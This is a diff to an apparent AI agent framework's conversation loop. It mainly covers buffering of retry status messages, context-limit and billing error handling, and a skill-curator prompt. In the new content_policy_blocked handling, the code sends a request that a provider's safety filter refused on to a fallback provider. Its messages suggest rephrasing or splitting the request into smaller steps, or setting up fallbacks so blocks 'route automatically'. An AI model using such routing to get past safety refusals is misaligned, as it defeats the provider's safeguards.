@@ -2189,7 +2333,7 @@ def run_conversation(
codex_auth_retry_attempted = True
if agent._try_refresh_codex_client_credentials(force=True):
_label = "xAI OAuth" if agent.provider == "xai-oauth" else "Codex"
agent._vprint(f"{agent.log_prefix}🔐 {_label} auth refreshed after 401. Retrying request...")
agent._buffer_vprint(f"🔐 {_label} auth refreshed after 401. Retrying request...")
continue
if (
agent.api_mode == "chat_completions"
@@ -2216,9 +2360,10 @@ def run_conversation(
print(f"{agent.log_prefix}🔐 Nous 401 — Portal authentication failed.")
if _body_text:
print(f"{agent.log_prefix} Response: {_body_text}")
print(f"{agent.log_prefix} Most likely: Portal OAuth expired, account out of credits, or agent key revoked.")
if not _print_nous_entitlement_guidance(agent, "Nous model access"):
print(f"{agent.log_prefix} Most likely: Portal OAuth expired, account out of credits, or agent key revoked.")
print(f"{agent.log_prefix} Troubleshooting:")
print(f"{agent.log_prefix} • Re-authenticate: hermes login --provider nous")
print(f"{agent.log_prefix} • Re-authenticate: hermes auth add nous")
print(f"{agent.log_prefix} • Check credits / billing: https://portal.nousresearch.com")
print(f"{agent.log_prefix} • Verify stored credentials: {_dhh}/auth.json")
print(f"{agent.log_prefix} • Switch providers temporarily: /model <model> --provider openrouter")
@@ -2229,7 +2374,7 @@ def run_conversation(
):
copilot_auth_retry_attempted = True
if agent._try_refresh_copilot_client_credentials():
agent._vprint(f"{agent.log_prefix}🔐 Copilot credentials refreshed after 401. Retrying request...")
agent._buffer_vprint(f"🔐 Copilot credentials refreshed after 401. Retrying request...")
continue
if (
agent.api_mode == "anthropic_messages"
@@ -2296,6 +2441,49 @@ def run_conversation(
)
continue
# ── Invalid encrypted reasoning replay recovery ───────
# OpenAI Responses API surfaces (and some compatible relays)
# return HTTP 400 ``invalid_encrypted_content`` when a
# replayed ``codex_reasoning_items`` blob from a previous
# turn fails verification (provider rotated the encryption
# key, the route doesn't actually persist reasoning state,
# etc.). Recovery: disable replay for the rest of the
# session, strip cached items from history, retry once.
# One-shot — if a second 400 fires we fall through to the
# normal retry/backoff path. Only fires for codex_responses
# mode with at least one assistant message that has cached
# ``codex_reasoning_items``; without replay state, the
# error is unrelated to our cache so the normal retry path
# handles it (the provider is rejecting something else).
if (
classified.reason == FailoverReason.invalid_encrypted_content
and not invalid_encrypted_content_retry_attempted
and agent.api_mode == "codex_responses"
and bool(getattr(agent, "_codex_reasoning_replay_enabled", True))
and any(
isinstance(_m, dict)
and _m.get("role") == "assistant"
and isinstance(_m.get("codex_reasoning_items"), list)
and _m.get("codex_reasoning_items")
for _m in messages
)
):
invalid_encrypted_content_retry_attempted = True
replay_stats = agent._disable_codex_reasoning_replay(messages)
agent._vprint(
f"{agent.log_prefix}⚠️ Encrypted reasoning replay was rejected by the provider — "
f"disabled replay and stripped {replay_stats['items']} item(s) from "
f"{replay_stats['messages']} message(s), retrying...",
force=True,
)
logger.warning(
"%sInvalid encrypted reasoning recovery: disabled replay and stripped %d items from %d messages",
agent.log_prefix,
replay_stats["items"],
replay_stats["messages"],
)
continue
# ── llama.cpp grammar-parse recovery ──────────────────
# llama.cpp's ``json-schema-to-grammar`` converter rejects
# regex escape classes (``\d``, ``\w``, ``\s``) and most
@@ -2361,41 +2549,37 @@ def run_conversation(
_base = getattr(agent, "base_url", "unknown")
_model = getattr(agent, "model", "unknown")
_status_code_str = f" [HTTP {status_code}]" if status_code else ""
agent._vprint(f"{agent.log_prefix}⚠️ API call failed (attempt {retry_count}/{max_retries}): {error_type}{_status_code_str}", force=True)
agent._vprint(f"{agent.log_prefix} 🔌 Provider: {_provider} Model: {_model}", force=True)
agent._vprint(f"{agent.log_prefix} 🌐 Endpoint: {_base}", force=True)
agent._vprint(f"{agent.log_prefix} 📝 Error: {_error_summary}", force=True)
agent._buffer_vprint(f"⚠️ API call failed (attempt {retry_count}/{max_retries}): {error_type}{_status_code_str}")
agent._buffer_vprint(f" 🔌 Provider: {_provider} Model: {_model}")
agent._buffer_vprint(f" 🌐 Endpoint: {_base}")
agent._buffer_vprint(f" 📝 Error: {_error_summary}")
if status_code and status_code < 500:
_err_body = getattr(api_error, "body", None)
_err_body_str = str(_err_body)[:300] if _err_body else None
if _err_body_str:
agent._vprint(f"{agent.log_prefix} 📋 Details: {_err_body_str}", force=True)
agent._vprint(f"{agent.log_prefix} ⏱️ Elapsed: {elapsed_time:.2f}s Context: {len(api_messages)} msgs, ~{approx_tokens:,} tokens")
agent._buffer_vprint(f" 📋 Details: {_err_body_str}")
agent._buffer_vprint(f" ⏱️ Elapsed: {elapsed_time:.2f}s Context: {len(api_messages)} msgs, ~{approx_tokens:,} tokens")
# Actionable hint for OpenRouter "no tool endpoints" error.
# This fires regardless of whether fallback succeeds — the
# user needs to know WHY their model failed so they can fix
# their provider routing, not just silently fall back.
# Buffered like the rest of the retry trace — surfaced only
# if every retry+fallback exhausts. Avoids spamming users
# who recover automatically via fallback.
if (
agent._is_openrouter_url()
and "support tool use" in error_msg
):
agent._vprint(
f"{agent.log_prefix} 💡 No OpenRouter providers for {_model} support tool calling with your current settings.",
force=True,
agent._buffer_vprint(
f" 💡 No OpenRouter providers for {_model} support tool calling with your current settings."
)
if agent.providers_allowed:
agent._vprint(
f"{agent.log_prefix} Your provider_routing.only restriction is filtering out tool-capable providers.",
force=True,
agent._buffer_vprint(
f" Your provider_routing.only restriction is filtering out tool-capable providers."
)
agent._vprint(
f"{agent.log_prefix} Try removing the restriction or adding providers that support tools for this model.",
force=True,
agent._buffer_vprint(
f" Try removing the restriction or adding providers that support tools for this model."
)
agent._vprint(
f"{agent.log_prefix} Check which providers support tools: https://openrouter.ai/models/{_model}",
force=True,
agent._buffer_vprint(
f" Check which providers support tools: https://openrouter.ai/models/{_model}"
)
# Check for interrupt before deciding to retry
@@ -2445,11 +2629,10 @@ def run_conversation(
# user later enables extra usage the 1M limit
# should come back automatically.
compressor._context_probe_persistable = False
agent._vprint(
f"{agent.log_prefix}⚠️ Anthropic long-context tier "
agent._buffer_vprint(
f"⚠️ Anthropic long-context tier "
f"requires extra usage — reducing context: "
f"{old_ctx:,} → {_reduced_ctx:,} tokens",
force=True,
f"{old_ctx:,} → {_reduced_ctx:,} tokens"
)
compression_attempts += 1
@@ -2465,7 +2648,7 @@ def run_conversation(
# messages to the new session, not skipping them.
conversation_history = None
if len(messages) < original_len or old_ctx > _reduced_ctx:
agent._emit_status(
agent._buffer_status(
f"🗜️ Context reduced to {_reduced_ctx:,} tokens "
f"(was {old_ctx:,}), retrying..."
)
@@ -2494,7 +2677,12 @@ def run_conversation(
base_url=getattr(agent, "base_url", None),
)
if not pool_may_recover:
agent._emit_status("⚠️ Rate limited — switching to fallback provider...")
if classified.reason == FailoverReason.billing:
agent._buffer_status(
"⚠️ Billing or credits exhausted — switching to fallback provider..."
)
else:
agent._buffer_status("⚠️ Rate limited — switching to fallback provider...")
if agent._try_activate_fallback(reason=classified.reason):
retry_count = 0
compression_attempts = 0
@@ -2606,6 +2794,8 @@ def run_conversation(
if is_payload_too_large:
compression_attempts += 1
if compression_attempts > max_compression_attempts:
# Terminal — surface the buffered retry trace.
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached for payload-too-large error.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}413 compression failed after {max_compression_attempts} attempts.")
@@ -2619,7 +2809,7 @@ def run_conversation(
"failed": True,
"compression_exhausted": True,
}
agent._emit_status(f"⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
agent._buffer_status(f"⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
original_len = len(messages)
messages, active_system_prompt = agent._compress_context(
@@ -2632,11 +2822,14 @@ def run_conversation(
conversation_history = None
if len(messages) < original_len:
agent._emit_status(f"🗜️ Compressed {original_len} → {len(messages)} messages, retrying...")
agent._buffer_status(f"🗜️ Compressed {original_len} → {len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
restart_with_compressed_messages = True
break
else:
# Terminal — surface buffered context so the user
# sees what compression attempts were made.
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Payload too large and cannot compress further.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}413 payload too large. Cannot compress further.")
@@ -2680,16 +2873,16 @@ def run_conversation(
# touching context_length or triggering compression.
safe_out = max(1, available_out - 64) # small safety margin
agent._ephemeral_max_output_tokens = safe_out
agent._vprint(
f"{agent.log_prefix}⚠️ Output cap too large for current prompt — "
agent._buffer_vprint(
f"⚠️ Output cap too large for current prompt — "
f"retrying with max_tokens={safe_out:,} "
f"(available_tokens={available_out:,}; context_length unchanged at {old_ctx:,})",
force=True,
f"(available_tokens={available_out:,}; context_length unchanged at {old_ctx:,})"
)
# Still count against compression_attempts so we don't
# loop forever if the error keeps recurring.
compression_attempts += 1
if compression_attempts > max_compression_attempts:
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}Context compression failed after {max_compression_attempts} attempts.")
@@ -2706,9 +2899,13 @@ def run_conversation(
restart_with_compressed_messages = True
break
# Error is about the INPUT being too large — reduce context_length.
# Try to parse the actual limit from the error message
parsed_limit = parse_context_limit_from_error(error_msg)
# Error is about the INPUT being too large. Only reduce
# context_length when the provider explicitly reports the
# real lower limit. If the provider only says "input
# exceeds the context window", keep the configured window
# and try compression; guessing probe tiers can incorrectly
# turn a user-configured 1M window into 256K/128K/64K.
new_ctx = get_context_length_from_provider_error(error_msg, old_ctx)
_provider_lower = (getattr(agent, "provider", "") or "").lower()
_base_lower = (getattr(agent, "base_url", "") or "").rstrip("/").lower()
is_minimax_provider = (
@@ -2720,24 +2917,12 @@ def run_conversation(
)
minimax_delta_only_overflow = (
is_minimax_provider
and parsed_limit is None
and new_ctx is None
and "context window exceeds limit (" in error_msg
)
if parsed_limit and parsed_limit < old_ctx:
new_ctx = parsed_limit
agent._vprint(f"{agent.log_prefix}Context limit detected from API: {new_ctx:,} tokens (was {old_ctx:,})", force=True)
elif minimax_delta_only_overflow:
new_ctx = old_ctx
agent._vprint(
f"{agent.log_prefix}Provider reported overflow amount only; "
f"keeping context_length at {old_ctx:,} tokens and compressing.",
force=True,
)
else:
# Step down to the next probe tier
new_ctx = get_next_probe_tier(old_ctx)
if new_ctx and new_ctx < old_ctx:
if new_ctx is not None:
agent._buffer_vprint(f"Context limit detected from API: {new_ctx:,} tokens (was {old_ctx:,})")
compressor.update_model(
model=agent.model,
context_length=new_ctx,
@@ -2747,23 +2932,26 @@ def run_conversation(
api_mode=agent.api_mode,
)
# Context probing flags — only set on built-in
# compressor (plugin engines manage their own).
# compressor (plugin engines manage their own). This
# value came from the provider, so it is safe to cache.
if hasattr(compressor, "_context_probed"):
compressor._context_probed = True
# Only persist limits parsed from the provider's
# error message (a real number). Guessed fallback
# tiers from get_next_probe_tier() should stay
# in-memory only — persisting them pollutes the
# cache with wrong values.
compressor._context_probe_persistable = bool(
parsed_limit and parsed_limit == new_ctx
)
agent._vprint(f"{agent.log_prefix}⚠️ Context length exceeded — stepping down: {old_ctx:,} → {new_ctx:,} tokens", force=True)
compressor._context_probe_persistable = True
agent._buffer_vprint(f"⚠️ Context length exceeded — using provider limit: {old_ctx:,} → {new_ctx:,} tokens")
elif minimax_delta_only_overflow:
agent._buffer_vprint(
f"Provider reported overflow amount only; "
f"keeping context_length at {old_ctx:,} tokens and compressing."
)
else:
agent._vprint(f"{agent.log_prefix}⚠️ Context length exceeded at minimum tier — attempting compression...", force=True)
agent._buffer_vprint(
f"⚠️ Context length exceeded, but provider did not report a max context length; "
f"keeping context_length at {old_ctx:,} tokens and compressing."
)
compression_attempts += 1
if compression_attempts > max_compression_attempts:
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}Context compression failed after {max_compression_attempts} attempts.")
@@ -2777,7 +2965,7 @@ def run_conversation(
"failed": True,
"compression_exhausted": True,
}
agent._emit_status(f"🗜️ Context too large (~{approx_tokens:,} tokens) — compressing ({compression_attempts}/{max_compression_attempts})...")
agent._buffer_status(f"🗜️ Context too large (~{approx_tokens:,} tokens) — compressing ({compression_attempts}/{max_compression_attempts})...")
original_len = len(messages)
messages, active_system_prompt = agent._compress_context(
@@ -2791,12 +2979,13 @@ def run_conversation(
if len(messages) < original_len or new_ctx and new_ctx < old_ctx:
if len(messages) < original_len:
agent._emit_status(f"🗜️ Compressed {original_len} → {len(messages)} messages, retrying...")
agent._buffer_status(f"🗜️ Compressed {original_len} → {len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
restart_with_compressed_messages = True
break
else:
# Can't compress further and already at minimum tier
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Context length exceeded and cannot compress further.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 The conversation has accumulated too much content. Try /new to start fresh, or /compress to manually trigger compression.", force=True)
logger.error(f"{agent.log_prefix}Context length exceeded: {approx_tokens:,} tokens. Cannot compress further.")
@@ -2835,6 +3024,21 @@ def run_conversation(
# ssl.SSLError explicitly so the error classifier's
# retryable=True mapping takes effect instead.
and not isinstance(api_error, ssl.SSLError)
# Provider/SDK "NoneType is not iterable" failures are
# shape mismatches from upstream (e.g. chatgpt.com Codex
# backend response.completed.output=null) — not local
# programming bugs. Even after #33042 made our own
# consumer immune, third-party shims and mocked clients
# can still surface this shape via TypeError. Treat
# them as retryable so the error classifier's normal
# retry/fallback path runs instead of killing the turn
# as non-retryable (which left Telegram users staring
# at a bare "Non-retryable error" with no recovery).
and not (
isinstance(api_error, TypeError)
and "nonetype" in str(api_error).lower()
and "not iterable" in str(api_error).lower()
)
)
# ``FailoverReason.billing`` (HTTP 402) is NOT in this
# exclusion set. By the time we reach this block:
@@ -2870,7 +3074,10 @@ def run_conversation(
if is_client_error:
# Try fallback before aborting — a different provider
# may not have the same issue (rate limit, auth, etc.)
agent._emit_status(f"⚠️ Non-retryable error (HTTP {status_code}) — trying fallback...")
if classified.reason == FailoverReason.content_policy_blocked:
agent._buffer_status("⚠️ Provider safety filter blocked this request — trying fallback...")
else:
agent._buffer_status(f"⚠️ Non-retryable error (HTTP {status_code}) — trying fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
@@ -2880,16 +3087,38 @@ def run_conversation(
agent._dump_api_request_debug(
api_kwargs, reason="non_retryable_client_error", error=api_error,
)
agent._emit_status(
f"❌ Non-retryable error (HTTP {status_code}): "
f"{agent._summarize_api_error(api_error)}"
)
# Terminal — flush buffered context so the user sees
# what was tried before the abort.
agent._flush_status_buffer()
if classified.reason == FailoverReason.content_policy_blocked:
agent._emit_status(
f"❌ Provider safety filter blocked this request: "
f"{agent._summarize_api_error(api_error)}"
)
else:
agent._emit_status(
f"❌ Non-retryable error (HTTP {status_code}): "
f"{agent._summarize_api_error(api_error)}"
)
agent._vprint(f"{agent.log_prefix}❌ Non-retryable client error (HTTP {status_code}). Aborting.", force=True)
agent._vprint(f"{agent.log_prefix} 🔌 Provider: {_provider} Model: {_model}", force=True)
agent._vprint(f"{agent.log_prefix} 🌐 Endpoint: {_base}", force=True)
# Actionable guidance for common auth errors
if classified.is_auth or classified.reason == FailoverReason.billing:
if _provider in {"openai-codex", "xai-oauth", "nous"} and status_code == 401:
if classified.reason == FailoverReason.billing and _print_billing_or_entitlement_guidance(
agent,
capability="model access",
provider=_provider,
base_url=str(_base),
model=_model,
):
pass
elif _provider == "nous" and _print_nous_entitlement_guidance(
agent,
"Nous model access",
):
pass
elif _provider in {"openai-codex", "xai-oauth", "nous"} and status_code == 401:
if _provider == "openai-codex":
agent._vprint(f"{agent.log_prefix} 💡 Codex OAuth token was rejected (HTTP 401). Your token may have been", force=True)
agent._vprint(f"{agent.log_prefix} refreshed by another client (Codex CLI, VS Code). To fix:", force=True)
@@ -2917,6 +3146,28 @@ def run_conversation(
agent._vprint(f"{agent.log_prefix} • Check credits: https://openrouter.ai/settings/credits", force=True)
else:
agent._vprint(f"{agent.log_prefix} 💡 This type of error won't be fixed by retrying.", force=True)
# Content-policy blocks deserve their own actionable
# guidance — neither "fix your API key" nor "retry won't
# help" tells the user what to actually do. The provider
# has refused this specific prompt, so the recovery is
# either a rephrase or routing to a different model.
if classified.reason == FailoverReason.content_policy_blocked:
agent._vprint(
f"{agent.log_prefix} 💡 The provider's safety filter rejected this specific prompt.",
force=True,
)
agent._vprint(
f"{agent.log_prefix} • Try rephrasing the request, narrowing the context, or splitting into smaller steps.",
force=True,
)
agent._vprint(
f"{agent.log_prefix} • Configure a fallback provider so future blocks route automatically:",
force=True,
)
agent._vprint(
f"{agent.log_prefix} hermes fallback add (interactive picker — same as `hermes model`)",
force=True,
)
logger.error(f"{agent.log_prefix}Non-retryable client error: {api_error}")
# Skip session persistence when the error is likely
# context-overflow related (status 400 + large session).
@@ -2931,6 +3182,23 @@ def run_conversation(
)
else:
agent._persist_session(messages, conversation_history)
if classified.reason == FailoverReason.content_policy_blocked:
_summary = agent._summarize_api_error(api_error)
_policy_response = (
f"⚠️ The model provider's safety filter blocked this request "
f"(not a Hermes/gateway failure).\n\n"
f"Provider message: {_summary}\n\n"
f"Try rephrasing the request, narrowing the context, or "
f"adding a fallback provider with `hermes fallback add`."
)
return {
"final_response": _policy_response,
"messages": messages,
"api_calls": api_call_count,
"completed": False,
"failed": True,
"error": f"content_policy_blocked: {_summary}",
}
return {
"final_response": None,
"messages": messages,
@@ -2952,14 +3220,32 @@ def run_conversation(
retry_count = 0
continue
# Try fallback before giving up entirely
agent._emit_status(f"⚠️ Max retries ({max_retries}) exhausted — trying fallback...")
agent._buffer_status(f"⚠️ Max retries ({max_retries}) exhausted — trying fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
primary_recovery_attempted = False
continue
# Terminal — flush buffered retry/fallback trace.
agent._flush_status_buffer()
_final_summary = agent._summarize_api_error(api_error)
if is_rate_limited:
_billing_guidance = ""
if classified.reason == FailoverReason.billing:
agent._emit_status(f"❌ Billing or credits exhausted — {_final_summary}")
_billing_guidance = _billing_or_entitlement_message(
capability="model access",
provider=_provider,
base_url=str(_base),
model=_model,
)
_print_billing_or_entitlement_guidance(
agent,
capability="model access",
provider=_provider,
base_url=str(_base),
model=_model,
)
elif is_rate_limited:
agent._emit_status(f"❌ Rate limited after {max_retries} retries — {_final_summary}")
else:
agent._emit_status(f"❌ API failed after {max_retries} retries — {_final_summary}")
@@ -3004,7 +3290,12 @@ def run_conversation(
api_kwargs, reason="max_retries_exhausted", error=api_error,
)
agent._persist_session(messages, conversation_history)
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
if classified.reason == FailoverReason.billing:
_final_response = f"Billing or credits exhausted: {_final_summary}"
if _billing_guidance:
_final_response += f"\n\n{_billing_guidance}"
else:
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
if _is_stream_drop:
_final_response += (
"\n\nThe provider's stream connection keeps "
@@ -3036,9 +3327,9 @@ def run_conversation(
pass
wait_time = _retry_after if _retry_after else jittered_backoff(retry_count, base_delay=2.0, max_delay=60.0)
if is_rate_limited:
agent._emit_status(f"⏱️ Rate limited. Waiting {wait_time:.1f}s (attempt {retry_count + 1}/{max_retries})...")
agent._buffer_status(f"⏱️ Rate limited. Waiting {wait_time:.1f}s (attempt {retry_count + 1}/{max_retries})...")
else:
agent._emit_status(f"⏳ Retrying in {wait_time:.1f}s (attempt {retry_count}/{max_retries})...")
agent._buffer_status(f"⏳ Retrying in {wait_time:.1f}s (attempt {retry_count}/{max_retries})...")
logger.warning(
"Retrying API call in %ss (attempt %s/%s) %s error=%s",
wait_time,
@@ -3197,14 +3488,15 @@ def run_conversation(
if has_incomplete_scratchpad(assistant_message.content or ""):
agent._incomplete_scratchpad_retries += 1
agent._vprint(f"{agent.log_prefix}⚠️ Incomplete <REASONING_SCRATCHPAD> detected (opened but never closed)")
agent._buffer_vprint(f"⚠️ Incomplete <REASONING_SCRATCHPAD> detected (opened but never closed)")
if agent._incomplete_scratchpad_retries <= 2:
agent._vprint(f"{agent.log_prefix}🔄 Retrying API call ({agent._incomplete_scratchpad_retries}/2)...")
agent._buffer_vprint(f"🔄 Retrying API call ({agent._incomplete_scratchpad_retries}/2)...")
# Don't add the broken message, just retry
continue
else:
# Max retries - discard this turn and save as partial
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max retries (2) for incomplete scratchpad. Saving as partial.", force=True)
agent._incomplete_scratchpad_retries = 0
@@ -3312,9 +3604,10 @@ def run_conversation(
available = ", ".join(sorted(agent.valid_tool_names))
invalid_name = invalid_tool_calls[0]
invalid_preview = invalid_name[:80] + "..." if len(invalid_name) > 80 else invalid_name
agent._vprint(f"{agent.log_prefix}⚠️ Unknown tool '{invalid_preview}' — sending error to model for agent-correction ({agent._invalid_tool_retries}/3)")
agent._buffer_vprint(f"⚠️ Unknown tool '{invalid_preview}' — sending error to model for agent-correction ({agent._invalid_tool_retries}/3)")
if agent._invalid_tool_retries >= 3:
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max retries (3) for invalid tool calls exceeded. Stopping as partial.", force=True)
agent._invalid_tool_retries = 0
agent._persist_session(messages, conversation_history)
@@ -3398,16 +3691,16 @@ def run_conversation(
agent._invalid_json_retries += 1
tool_name, error_msg = invalid_json_args[0]
agent._vprint(f"{agent.log_prefix}⚠️ Invalid JSON in tool call arguments for '{tool_name}': {error_msg}")
agent._buffer_vprint(f"⚠️ Invalid JSON in tool call arguments for '{tool_name}': {error_msg}")
if agent._invalid_json_retries < 3:
agent._vprint(f"{agent.log_prefix}🔄 Retrying API call ({agent._invalid_json_retries}/3)...")
agent._buffer_vprint(f"🔄 Retrying API call ({agent._invalid_json_retries}/3)...")
# Don't add anything to messages, just retry the API call
continue
else:
# Instead of returning partial, inject tool error results so the model can recover.
# Using tool results (not user messages) preserves role alternation.
agent._vprint(f"{agent.log_prefix}⚠️ Injecting recovery tool results for invalid JSON...")
agent._buffer_vprint(f"⚠️ Injecting recovery tool results for invalid JSON...")
agent._invalid_json_retries = 0 # Reset for next attempt
# Append the assistant message with its (broken) tool_calls
@@ -3715,7 +4008,7 @@ def run_conversation(
"Empty response after tool calls — nudging model "
"to continue processing"
)
agent._emit_status(
agent._buffer_status(
"⚠️ Model returned empty after tool calls — "
"nudging to continue"
)
@@ -3761,7 +4054,7 @@ def run_conversation(
"prefilling to continue (%d/2)",
agent._thinking_prefill_retries,
)
agent._emit_status(
agent._buffer_status(
f"↻ Thinking-only response — prefilling to continue "
f"({agent._thinking_prefill_retries}/2)"
)
@@ -3796,7 +4089,7 @@ def run_conversation(
"retry %d/3 (model=%s)",
agent._empty_content_retries, agent.model,
)
agent._emit_status(
agent._buffer_status(
f"⚠️ Empty response from model — retrying "
f"({agent._empty_content_retries}/3)"
)
@@ -3815,13 +4108,13 @@ def run_conversation(
agent._empty_content_retries, agent.model,
agent.provider,
)
agent._emit_status(
agent._buffer_status(
"⚠️ Model returning empty responses — "
"switching to fallback provider..."
)
if agent._try_activate_fallback():
agent._empty_content_retries = 0
agent._emit_status(
agent._buffer_status(
f"↻ Switched to fallback: {agent.model} "
f"({agent.provider})"
)
@@ -3835,6 +4128,9 @@ def run_conversation(
# Exhausted retries and fallback chain (or no
# fallback configured). Fall through to the
# "(empty)" terminal.
# Surface the buffered retry/fallback trace so the
# user can see what was attempted before "(empty)".
agent._flush_status_buffer()
_turn_exit_reason = "empty_response_exhausted"
reasoning_text = agent._extract_reasoning(assistant_message)
agent._drop_trailing_empty_response_scaffolding(messages)
@@ -3879,6 +4175,9 @@ def run_conversation(
# Reset retry counter/signature on successful content
agent._empty_content_retries = 0
agent._thinking_prefill_retries = 0
# Successful content reached — drop any buffered retry
# status from earlier failed attempts in this turn.
agent._clear_status_buffer()
if (
agent.api_mode == "codex_responses"
@@ -4262,6 +4561,7 @@ def run_conversation(
original_user_message=original_user_message,
final_response=final_response,
interrupted=interrupted,
messages=messages,
)
# Background memory/skill review — runs AFTER the response is delivered
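The hunks above route retry and fallback notices through `_buffer_status` / `_buffer_vprint`, call `_flush_status_buffer()` when a retry budget is exhausted, and call `_clear_status_buffer()` once real content arrives. The diff does not show how those helpers are implemented, so the following is only a minimal sketch of that buffer/flush/clear pattern, assuming a plain in-memory list. `StatusBuffer` and its `emit` callback are hypothetical names, not part of the codebase.

```python
from typing import Callable, List


class StatusBuffer:
    """Hypothetical stand-in for the agent's buffered status helpers."""

    def __init__(self, emit: Callable[[str], None]) -> None:
        self._emit = emit              # sink that actually shows a line to the user
        self._pending: List[str] = []  # retry notices held back for now

    def buffer(self, message: str) -> None:
        # Retry noise is held back instead of being shown immediately.
        self._pending.append(message)

    def flush(self) -> None:
        # Terminal failure: replay everything that was attempted, in order.
        for message in self._pending:
            self._emit(message)
        self._pending.clear()

    def clear(self) -> None:
        # Success: the retry trace is no longer interesting, so drop it silently.
        self._pending.clear()


shown: List[str] = []
buf = StatusBuffer(shown.append)

buf.buffer("Retrying in 2.0s (attempt 1/3)...")
buf.clear()   # the retry succeeded, nothing is shown
buf.buffer("Empty response from model, retrying (1/3)")
buf.buffer("Switching to fallback provider...")
buf.flush()   # retries exhausted, show the trace
```

Under this reading, a turn that recovers after one retry shows no status lines at all, while a turn that ends in failure shows the full trace of what was attempted.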
+5 -5
@@ -240,11 +240,11 @@ def _clear_auth_store_provider(provider: str) -> bool:
def _remove_nous_device_code(provider: str, removed) -> RemovalResult:
"""Nous OAuth lives in auth.json providers.nous — clear it and suppress.
We suppress in addition to clearing because nothing else stops the
user's next `hermes login` run from writing providers.nous again
before they decide to. Suppression forces them to go through
`hermes auth add nous` to re-engage, which is the documented re-add
path and clears the suppression atomically.
We suppress in addition to clearing because nothing else stops a future
`hermes auth add nous` (or any other path that writes providers.nous)
from re-seeding before the user has decided to. Suppression forces
them to go through `hermes auth add nous` to re-engage, which is the
documented re-add path and clears the suppression atomically.
"""
result = RemovalResult()
if _clear_auth_store_provider(provider):
+20 -1
@@ -390,7 +390,26 @@ CURATOR_REVIEW_PROMPT = (
"(verification scripts, fixture generators, probes)\n"
" Then archive the old sibling. Use `terminal` with `mkdir -p "
"~/.hermes/skills/<umbrella>/references/ && mv ... <umbrella>/"
"references/<topic>.md` (or templates/ / scripts/).\n"
"references/<topic>.md` (or templates/ / scripts/).\n\n"
"Package integrity — not optional:\n"
"Before demoting or archiving a skill, inspect it as a COMPLETE "
"directory package, not just SKILL.md. A skill root may include "
"`references/`, `templates/`, `scripts/`, and `assets/`; `skill_view` "
"discovers those relative to the skill root. A reference markdown file "
"inside another skill is NOT a new skill root and does not get its own "
"linked-file discovery.\n"
"If the source skill has support files OR SKILL.md contains relative "
"links such as `references/...`, `templates/...`, `scripts/...`, or "
"`assets/...`, DO NOT flatten only SKILL.md into "
"`<umbrella>/references/<old>.md`. Choose one safe path instead:\n"
" • keep it as a standalone skill, OR\n"
" • fully merge it by re-homing every needed support file into the "
"umbrella's canonical `references/`, `templates/`, `scripts/`, or "
"`assets/` directories AND rewrite the destination instructions to "
"the new paths, OR\n"
" • archive the entire original skill package unchanged.\n"
"Never leave archived/demoted instructions pointing at files that were "
"left behind under the old skill directory.\n"
"4. Also flag skills whose NAME is too narrow (contains a PR number, "
"a feature codename, a specific error string, an 'audit' / "
"'diagnosis' / 'salvage' session artifact). These almost always "
-4
@@ -904,10 +904,6 @@ def get_cute_tool_message(
extra = f" +{len(urls)-1}" if len(urls) > 1 else ""
return _wrap(f"┊ 📄 fetch {_trunc(domain, 35)}{extra} {dur}")
return _wrap(f"┊ 📄 fetch pages {dur}")
if tool_name == "web_crawl":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🕸️ crawl {_trunc(domain, 35)} {dur}")
if tool_name == "terminal":
return _wrap(f"┊ 💻 $ {_trunc(args.get('command', ''), 42)} {dur}")
if tool_name == "process":
+153 -6
@@ -44,12 +44,14 @@ class FailoverReason(enum.Enum):
payload_too_large = "payload_too_large" # 413 — compress payload
image_too_large = "image_too_large" # Native image part exceeds provider's per-image limit — shrink and retry
# Model
# Model / provider policy
model_not_found = "model_not_found" # 404 or invalid model — fallback to different model
provider_policy_blocked = "provider_policy_blocked" # Aggregator (e.g. OpenRouter) blocked the only endpoint due to account data/privacy policy
content_policy_blocked = "content_policy_blocked" # Provider safety filter rejected this prompt — deterministic per-request, don't retry unchanged
# Request format
format_error = "format_error" # 400 bad request — abort or strip + retry
invalid_encrypted_content = "invalid_encrypted_content" # Responses replay blob rejected — strip replay state and retry
multimodal_tool_content_unsupported = "multimodal_tool_content_unsupported" # Provider rejected list-type content in tool messages (e.g. Xiaomi MiMo) — downgrade to text and retry
# Provider-specific
@@ -96,13 +98,20 @@ _BILLING_PATTERNS = [
"insufficient_quota",
"insufficient balance",
"credit balance",
"credits exhausted",
"credits have been exhausted",
"no usable credits",
"top up your credits",
"payment required",
"billing hard limit",
"exceeded your current quota",
"account is deactivated",
"plan does not include",
"out of funds",
"run out of funds",
"balance_depleted",
"model_not_supported_on_free_tier",
"not available on the free tier",
]
# Patterns that indicate rate limiting (transient, will resolve)
